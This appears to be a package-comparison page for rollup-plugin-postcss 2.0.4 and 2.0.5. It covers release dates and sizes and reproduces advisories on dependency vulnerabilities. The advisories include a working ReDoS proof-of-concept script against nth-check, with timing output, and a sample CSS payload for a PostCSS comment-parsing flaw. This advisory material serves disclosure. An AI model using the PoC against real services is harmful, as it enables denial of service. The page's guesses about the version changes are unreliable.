Rollup-plugin-postcss is a valuable tool for developers seeking seamless integration between Rollup and PostCSS, streamlining CSS processing within their JavaScript projects. Comparing versions 2.0.4 and 2.0.5 reveals subtle but potentially impactful changes. The core dependencies remain consistent across both versions, indicating a stable foundation for PostCSS integration, including essential packages like cssnano for CSS optimization and postcss-modules for modular CSS handling. Development dependencies also share the same versions.
The key lies in the details. Version 2.0.5 was released on January 26, 2020, while version 2.0.4 was released on January 22, 2020, indicating a relatively short interval between releases. The unpacked size on disk is slightly different: 48964 bytes for 2.0.4, compared to 48943 bytes for version 2.0.5. This small reduction in size suggests potential optimizations or minor adjustments in the codebase.
For developers, the upgrade from 2.0.4 to 2.0.5 appears to be a low-risk endeavor. The shared dependency versions suggest no breaking changes or major feature additions. The slightly reduced unpacked size might translate to marginal performance improvements during installation or usage. While the changelog isn't directly available, the update likely addresses bug fixes, internal refactoring, or minor enhancements that contribute to the overall stability and efficiency of the plugin. Thorough testing after updating is always recommended to ensure compatibility with specific project setups.
All the vulnerabilities related to the version 2.0.5 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.